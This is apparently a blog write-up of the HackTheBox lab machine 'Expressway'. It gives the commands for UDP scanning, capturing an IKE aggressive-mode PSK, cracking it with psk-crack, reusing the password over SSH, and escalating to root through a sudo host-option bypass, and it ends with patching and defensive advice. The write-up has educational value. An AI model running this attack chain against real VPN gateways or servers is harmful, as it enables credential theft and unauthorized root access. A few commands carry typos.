BobTheSkull logoBobTheSkull
Hack The Box

Expressway — HackTheBox

Difficulty: Medium

← Back to writeups

Introduction

Expressway is a HackTheBox machine focused on IPSec/IKE reconnaissance, it delves into PSK cracking, SSH pivoting, and a hostname-based sudo bypass. Key take aways from this box was network enumeration, privilege-escalation, and learning about PSK communication protocols.

Reconnaissance

I always personally begin any box with a simple TCP port scan

nmap -sV -sC -vv -oA expressway 10.129.99.253

Output:

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The only port that showed on the TCP scan was SSH on port 22, so I began enumerating the machine more by doing a UDP scan. Simultaneously I pushed an all port TCP scan through at the same time - as nmap only scans the 1,000 most popular ports per protocol.

nmap -sV -sC -vv -p- -oA expressway 10.129.99.253
nmap -sU -sV -sC -vv -T4 -oA expressway 10.129.99.253
PORT      STATE         SERVICE        VERSION  
68/udp    open|filtered dhcpc  
69/udp    open          tftp           Netkit tftpd or atftpd  
500/udp   open          isakmp?  
1044/udp  open|filtered dcutility  
1885/udp  open|filtered vrtstrapserver  
4500/udp  open|filtered nat-t-ike  
5001/udp  open|filtered commplex-link  
18258/udp open|filtered unknown  
18888/udp open|filtered apc-necmp

TCP Scan:

  • Yielded little to nothing of value

UDP Scan:

  • DHCP Client: Dynamic Host Configuration Protocol
  • TFTP: Trivial File Transfer Protocol
  • ISAKMP?: Internet Security Association and Key Management Protocol
  • NAT-T: Network Address Translation - Traversal

My initial plan of action at this point is one of the three:

  1. Brute force the ssh username and credentials possibly
  2. Research TFTP and any possible exploits that could come with it
  3. Or Look into ISAKMP and learn or exploit anything I can find to revolve around that.

What is ISAKMP?

  • I had no idea, so to google we went. According to the google gods ISAKMP: is part of the Internet Key Exchange (IKE) protocol, which is a key component of the IPsec protocol suite. Used to establish Security Associations (SAs) for IPsec
    • IPsec is something I do know, it's simply a suite of protocols that allow us to establish virtual private networks (VPNs) over public networks

Research into IKE/ISAKMP (UDP 500/4500) exposed that they're generally a very attractive attack surface because implementations may run in less-secure modes, leak identity information, or rely on pre-shared keys (PSKs).

After some research into any tools or packages that'd let us poke and prod at this open UDP port more I came across a kit that helps in discovery and fingerprinting of IKE hosts.

Ike Scan

root@kali:~# ike-scan -h
Usage: ike-scan [options] [hosts...]

Utilizing the following tool exposed a treasure trove of information.

sudo ike-scan -M 10.129.99.253

The IKE handshake returned:

  • SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK ...) - the peer simply requires a PSK on top of transmitting all of this information with 3DES + SHA1, both deprecated by the National Institution of Standards and Technology (NIST) for being insecure.

On the same IKE Scan page that we used earlier it details psk-crack, a tool suite developed to crack MD5 or SHA1-based hashes (this will come in handy in a second).

The IKE-scan tool suite comes with an aggressive mode that allows for the scanning and potential collection of the service leaked identity or PSK material:

sudo ike-scan -A -Ppsk.txt 10.129.99.253

Aggressive-mode leak & PSK capture

Aggressive mode returned an identity and a hash (liquid gold)

  • ID(Type=ID_USER_FQDN, [email protected]) - target handed me who it was on a virtual business card basically.
  • A 20-byte PSK hash was returned and saved to psk.txt

PSK cracking

  • Like most cracking of passwords that are hashed we could do it via a dictionary attack with tools like JohnTheRipper or HashCat (personal fav). However, I wanted to give the PSK-crack tool a try.
psk-rack -d /usr/share/wordlists/rockyou.txt psk.txt

Output:

Running in dictionary cracking mode
key "freakingrockstarontheroad" matches SHA1 hash b12723ccf305828e259734c131ea45dec532db0b

Boom we've obtained a password of: freakingrockstarontheroad

With that information we're able to now try some login credentials to see if there's reuse across protocol.

ssh [email protected]
#freakingrockstarontheroad

Plain and simple we obtained a user shell directly into the machine yay.

Capturing 1st Flag

cat user.txt

Privilege Escalation

Here's a few commands I like to run at the beginning of getting any form of shell into a machine (keep in mind these are noisy)

uname -a
pwd
cat/etc/passwd
cd /root

What was found to be interesting:

ike@expressway:~$ sudo -l
[sudo] password for ike: <redacted>
Sorry, user ike may not run sudo on expressway.

Verifying the version of sudo and a quick web search of the Sorry, user __ may not run sudo on ___ brought up the following CVE from Exploit-DB

I immediately decided to try and find another host on the network that could potentially have sudo privileges to leverage this CVE.

grep -Ri "expressway" /etc /var/log 2>/dev/null | sed -n '1,120p'

I spent

Recursively running a grep command ignoring capitalization through etc and log files looking for "expressway" is what yielded me with a different host.

The command yielded the following host: offramp.expressway.htb

ike@expressway:sudo -h offramp.expressway.htb -i
root@expressway:~#

Boom, we got root box has been PWNED. Flag found in root directory as per usual.

Key Takeaways

  • Primary attack surface: UDP IKE/ISAKMP (500/4500) - the box leaked identity in Agressive mode and exposed a PSK hash
  • Main tools/commands: nmap ike-scan psk-crack ssh sudo
  • Reason for Exploit: weak/outdated crypto (3DES, SHA1,) PSK reuse across services, and unsafe sudo Host_alias + NOPASSWD rule

Patching/Defensive

  • Patch sudo to the fixed version (1.9.17p1+ or vendor patch). Remove vulnerable version.
  • Do not use NOPASSWD:ALL with host-based aliases. Avoid broad Host_Alias + NOPASSWD combos - leverage explicit per-role rules or certificate-based sudo policies
  • Utilize certificates over PSKs for IKE/IKEv2; disable IKEv1 aggressive mode when possible, you're substituting security for speed.
  • Monitoring: theoretically setting parameters for unusual sudo -h usage, and detecting for sudo -l
  • Offline cracking of PSKs is effective assuming weak password security. Although SHA1 is incredibly weak via collision attacks having a not easily brute-forcible passwd via dictionary attack would increase difficulty.

Learned

  • Some strong passive reconnaissance (logs, DHCP leases, certs SANs) finds hosts faster than brute forcing.
  • UDP/IKE is a high-value service -- always check 500/4500 when you see VPN-related services